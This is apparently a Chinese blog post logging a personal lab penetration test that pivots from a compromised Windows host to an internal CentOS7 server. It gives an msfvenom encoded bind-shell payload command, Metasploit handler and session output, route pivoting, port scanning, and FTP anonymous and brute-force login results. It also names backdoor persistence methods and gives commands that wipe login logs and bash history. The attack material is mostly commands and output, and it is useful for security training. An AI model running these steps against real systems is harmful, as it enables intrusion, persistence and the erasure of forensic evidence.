渗透测试系列-本地一-内网测试-第三步内网扫描,主机发现阶段+内网服务主机centos7渗透

  • by
打算以本地两个+实际两个,共四个渗透实例进行练习,把手法与以前以及现在遇到的细节问题一一解决

本地一 web测试+内网测试
本地二 web测试 10余种web漏洞经典poc
实际一 web测试 (中低)
实际二 web+内网测试 (较低)

本地一:web测试主机win7->win12域控->centos7服务器

本文是本地一的内网测试第三步,以本地一web测试拿到的win7主机以及win12主机进行二级跳板,渗透内网服务主机centos7

win7和win12是118网段

win12和centos7又同在142网段

一.msf 拿到session,转发
二.msf扫描
三.linux主机后渗透信息收集
四.linux主机提权
五.linux主机后渗透权限维持
六.linux主机痕迹清理

一.msf 拿到session,转发

1.kali生成一个木马,上传到win12,监听本地,方便kali远程连接

msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=0.0.0.0 LPORT=8899 -f exe >bendi127.exe

2.本地远程尝试连接

use exploit/multi/handler
set PAYLOAD windows/bind_tcp
set RHOST 192.168.118.130
set RPORT 8899

msf5 exploit(multi/handler) > run

[] Started bind TCP handler against 192.168.118.130:8899 [] Sending stage (179779 bytes) to 192.168.118.130
[*] Meterpreter session 2 opened (192.168.118.128-192.168.118.131:0 -> 192.168.118.130:8899) at 2019-09-21 14:24:40 +0800

msf5 exploit(multi/handler) > sessions -l

Active sessions

Id Name Type Information Connection
— —- —- ———– ———-
1 meterpreter x86/windows root-PC\Administrator @ ROOT-PC 192.168.118.128:8999 -> 192.168.118.131:49412 (192.168.118.131)
2 meterpreter x86/windows TEST\administrator @ WIN-GU9SGOKTM58 192.168.118.128-192.168.118.131:0 -> 192.168.118.130:8899 (192.168.118.130)

msf5 exploit(multi/handler) > sessions 2
[*] Starting interaction with 2…

meterpreter > getuid
Server username: TEST\administrator

3.添加路由

run post/multi/manage/autoroute

二.msf扫描

centos开启了5个服务

systemctl start named
systemctl start sshd
systemctl start httpd
systemctl start vsftpd
systemctl start smb

1.首先扫描端口

这里syn扫描是有一定问题了,扫描次数过多,就是syn dos了

msf5 > use auxiliary/scanner/portscan/syn 
msf5 auxiliary(scanner/portscan/syn) > set rhosts 192.168.142.130
rhosts => 192.168.142.130
msf5 auxiliary(scanner/portscan/syn) > set threads 100
threads => 100
msf5 auxiliary(scanner/portscan/syn) > set ports
ports => 1-10000
msf5 auxiliary(scanner/portscan/syn) > set ports 21,22,23,53,80,8080,139,145,111,7001,3306,1433,1521
ports => 21,22,23,53,80,8080,139,145,111,7001,3306,1433,1521
msf5 auxiliary(scanner/portscan/syn) > run

[+] TCP OPEN 192.168.142.130:21
[+] TCP OPEN 192.168.142.130:22
[+] TCP OPEN 192.168.142.130:53
[+] TCP OPEN 192.168.142.130:80
[+] TCP OPEN 192.168.142.130:111
[+] TCP OPEN 192.168.142.130:139

2.ftp

msf5 > use auxiliary/scanner/ftp/
use auxiliary/scanner/ftp/anonymous
use auxiliary/scanner/ftp/bison_ftp_traversal
use auxiliary/scanner/ftp/colorado_ftp_traversal
use auxiliary/scanner/ftp/easy_file_sharing_ftp
use auxiliary/scanner/ftp/ftp_login
use auxiliary/scanner/ftp/ftp_version
use auxiliary/scanner/ftp/konica_ftp_traversal
use auxiliary/scanner/ftp/pcman_ftp_traversal
use auxiliary/scanner/ftp/titanftp_xcrc_traversal
msf5 > use auxiliary/scanner/ftp/anonymous


msf5 auxiliary(scanner/ftp/anonymous) > set rhosts 192.168.142.130
rhosts => 192.168.142.130
msf5 auxiliary(scanner/ftp/anonymous) > run

[+] 192.168.142.130:21 - 192.168.142.130:21 - Anonymous READ (220 (vsFTPd 3.0.2))
[*] 192.168.142.130:21 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed




[+] 192.168.142.130:21 - 192.168.142.130:21 - Login Successful: alice:123456
[*] 192.168.142.130:21 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ftp/ftp_login) >

3.ssh

msf5 > use auxiliary/scanner/ssh/
use auxiliary/scanner/ssh/apache_karaf_command_execution
use auxiliary/scanner/ssh/cerberus_sftp_enumusers
use auxiliary/scanner/ssh/detect_kippo
use auxiliary/scanner/ssh/eaton_xpert_backdoor
use auxiliary/scanner/ssh/fortinet_backdoor
use auxiliary/scanner/ssh/juniper_backdoor
use auxiliary/scanner/ssh/karaf_login
use auxiliary/scanner/ssh/libssh_auth_bypass
use auxiliary/scanner/ssh/ssh_enumusers
use auxiliary/scanner/ssh/ssh_identify_pubkeys
use auxiliary/scanner/ssh/ssh_login
use auxiliary/scanner/ssh/ssh_login_pubkey
use auxiliary/scanner/ssh/ssh_version

4.smb


msf5 > use auxiliary/scanner/smb/
use auxiliary/scanner/smb/impacket/dcomexec
use auxiliary/scanner/smb/impacket/secretsdump
use auxiliary/scanner/smb/impacket/wmiexec
use auxiliary/scanner/smb/pipe_auditor
use auxiliary/scanner/smb/pipe_dcerpc_auditor
use auxiliary/scanner/smb/psexec_loggedin_users
use auxiliary/scanner/smb/smb1
use auxiliary/scanner/smb/smb2
use auxiliary/scanner/smb/smb_enum_gpp
use auxiliary/scanner/smb/smb_enumshares
use auxiliary/scanner/smb/smb_enumusers
use auxiliary/scanner/smb/smb_enumusers_domain
use auxiliary/scanner/smb/smb_login
use auxiliary/scanner/smb/smb_lookupsid
use auxiliary/scanner/smb/smb_ms17_010
use auxiliary/scanner/smb/smb_uninit_cred
use auxiliary/scanner/smb/smb_version

三.linux主机后渗透信息收集

图来自:https://blog.csdn.net/weixin_39997829/article/details/79873423

四.linux主机提权

可参考本人的:http://www.naivete.online/linux%e6%8f%90%e6%9d%83%e5%92%8cwindows%e6%8f%90%e6%9d%83%ef%bc%88%e4%ba%8c%ef%bc%89/

exp、计划任务、suid等

五.linux主机后渗透权限维持

可参考本人的:http://www.naivete.online/%e5%90%8e%e6%b8%97%e9%80%8f-linux%e6%9d%83%e9%99%90%e7%bb%b4%e6%8c%81/

一.端口复用
二.Linux预加载型恶意动态链接库的后门
三.进程注入
四.strace后门
五.ssh后门
六.suid后门
七.vim后门

六.linux主机痕迹清理

参考:

https://blog.csdn.net/menghuanbeike/article/details/78949483
https://blog.csdn.net/qq_33020901/article/details/82894353
https://www.lshack.cn/661/

web日志,以及系统日志,系统日志中的登陆日志;暂时也没有想到更多的信息清理,用了什么清理什么

登陆日志(其中空格+command真是新姿势):

last 命令 对应日志文件 /var/log/wtmp: 成功登陆用户
lastb 命令 对应日志文件 /var/log/btmp: 尝试登陆用户
lastlog 命令 对应日志文件 /var/log/lastlog: 最近登陆信息

清空日志文件:
echo > /var/log/wtmp
echo > /var/log/btmp
echo > /var/log/lastlog

清除 Bash 历史
可以在执行命令时,指定 Bash 不保存命令:

$ <空格> command

在要执行的命令前加一个空格。

清除当前登录 session 的历史:

$ history -r

清楚所有历史:

$ history -cw

2019.9.21

发表评论

电子邮件地址不会被公开。 必填项已用*标注